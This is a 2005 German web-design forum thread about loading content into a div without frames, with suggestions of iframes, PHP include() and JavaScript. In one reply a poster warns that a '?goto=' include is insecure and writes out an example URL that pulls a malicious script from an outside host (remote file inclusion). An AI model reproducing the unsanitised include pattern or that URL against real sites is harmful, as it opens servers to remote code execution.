Anzeige

Frage zu CSS und <div>

Frage zu CSS und <div> | PSD-Tutorials.de

Erstellt von Askalon, 16.08.2005.

  1. Askalon

    Askalon Aktives Mitglied

    Dabei seit:
    20.12.2004
    Beiträge:
    312
    Ort:
    München
    Frage zu CSS und <div>
    Hi
    wenn ich einem <div>-Bereich eine ID gebe,kann ich dann bei links mit target="id" Inhalte in dem Bereich öffnen?

    Was ich damit bezwecke:
    ich hab eine Homepageidee mit mehren Feldern.
    Grundgedanke war das ich es mit verschachteltem Frameset und mit Iframes verwirkliche.Aber mittlerweile ich nicht mehr gerne mit Frames arbeite,suche ich nach anderen Möglichkeiten.
    ich hoffe ihr versteht was ich meine
    gruss
     
    #1      
  2. TRex2003

    TRex2003 Hat es drauf

    Dabei seit:
    15.04.2004
    Beiträge:
    2.582
    Geschlecht:
    männlich
    Software:
    vi :P
    Frage zu CSS und <div>
    nein es geht nicht, wenn ich nicht irre. das ist das manko, das ich habe und weswegen ich noch bei iframes bin.

    die einzige möglichkeit, das ohne iframes zu machen, ist php. das muss aber erstmal gelernt sein ;)

    und nun dürfen die verteidiger von css und barrierefreiem design vortreten ^^
     
    #2      
  3. profipages

    profipages Guest

    Frage zu CSS und <div>
    DHTML

    iframes sind sicherlich eine Möglichkeit, wobei das nicht w3c-konform ist, d.h. wird nicht in allen Browsern angezeigt.

    Mit PHP geht es relativ einfach, wenn man das kann :wink:

    Man kann die Inhalte eines DIV das eine ID hat aber auch mit Javascript dynamisch austauschen, wobei man dann allerdings auch nicht um Browserweichen herumkommt und wie bei allem sollte man dann auch tiefe Kenntnisse darüber haben. :wink: .

    Ohne Beispielansicht geht aber wieder mal nix und ist das ganze eher allgemein und Blindflug.

    gruß
    profipages
     
    #3      
  4. Imagination

    Imagination Gesperrt

    Dabei seit:
    08.01.2005
    Beiträge:
    17
    Ort:
    Alsleben, Sachsen-Anhalt, Deutschland
    Frage zu CSS und <div>
    Also wenn du neu im Webdesign bzw Coden bist, dann nimm i-frames, für Einsteiger wohl das Beste aber ich weiß ja nicht wie weit du bist.

    Aber wenn du relativ erfahren bist, dann kannst du natürlich mit php arbeiten, am besten mit einer Tabelle, die gibst du den Namen "content" oder so und dann lässt du halt diverse Datein in dem content öffnen.

    Also mit dem "?goto=xxxx" Befehl.

    Dann die einfachere Möglichkeit ist, wie gesagt, der include() Befehl. :)


    Edit: Wenn ich jetzt hier Müll gelabert habe, lasst es mich wissen. Dann hab ich wahrscheinlich die Frage missverstanden. :oops: :D
     
    #4      
  5. TRex2003

    TRex2003 Hat es drauf

    Dabei seit:
    15.04.2004
    Beiträge:
    2.582
    Geschlecht:
    männlich
    Software:
    vi :P
    Frage zu CSS und <div>
    ich denke, er meint das so, dass man sowas wie <a href=$ziel +".html"> oder so macht..is aber saumäßig unsicher, da man dann sowas bspw. machen könnte
    w*w.deineseite.de/index.php?goto=http://www.boeseseite.de/bösesscript.php

    und schon läuft böses script auf deinem server..es sei denn, man entfernt umständlich die möglichkeit externer hosts.
     
    #5      
  6. Imagination

    Imagination Gesperrt

    Dabei seit:
    08.01.2005
    Beiträge:
    17
    Ort:
    Alsleben, Sachsen-Anhalt, Deutschland
    Frage zu CSS und <div>
    Ja pass auf, vielleicht hab ich auch voll nicht ergriffen was du haben willst. :wink:

    Ich dachte mir du willst irgendne Datei in ner Tabelle oder so öffnen lassen, ohne für jede Seite eine extra Seite halt machen zu müssen und da ist der goto Befehl halt gut.

    http://w*w.deineseite.de/page?goto=aboutme

    oder so.

    Und dann öffnet sich die about_me Seite in dieser kleinen Tabelle aber ich denk mal ich hab was falsch verstanden oder? :D

    EDIT: Ok, zum Unsicherheits-Faktor: ist das eine kommerzielle Seite, dann sollte man schon ein paar elegante Sicherungen mit einbauen, stimmt.
     
    #6      
  7. SWalker

    SWalker Nicht mehr ganz neu hier

    Dabei seit:
    20.04.2005
    Beiträge:
    176
    Frage zu CSS und <div>
    Das mit dem PHP und der Navigation habe ich auch schon gefragt und habe gute antwort bekommen

    Also mal im Webdesign Forum schauen ;)


    Grüsse SWalker[/url]
     
    #7      
x
×
×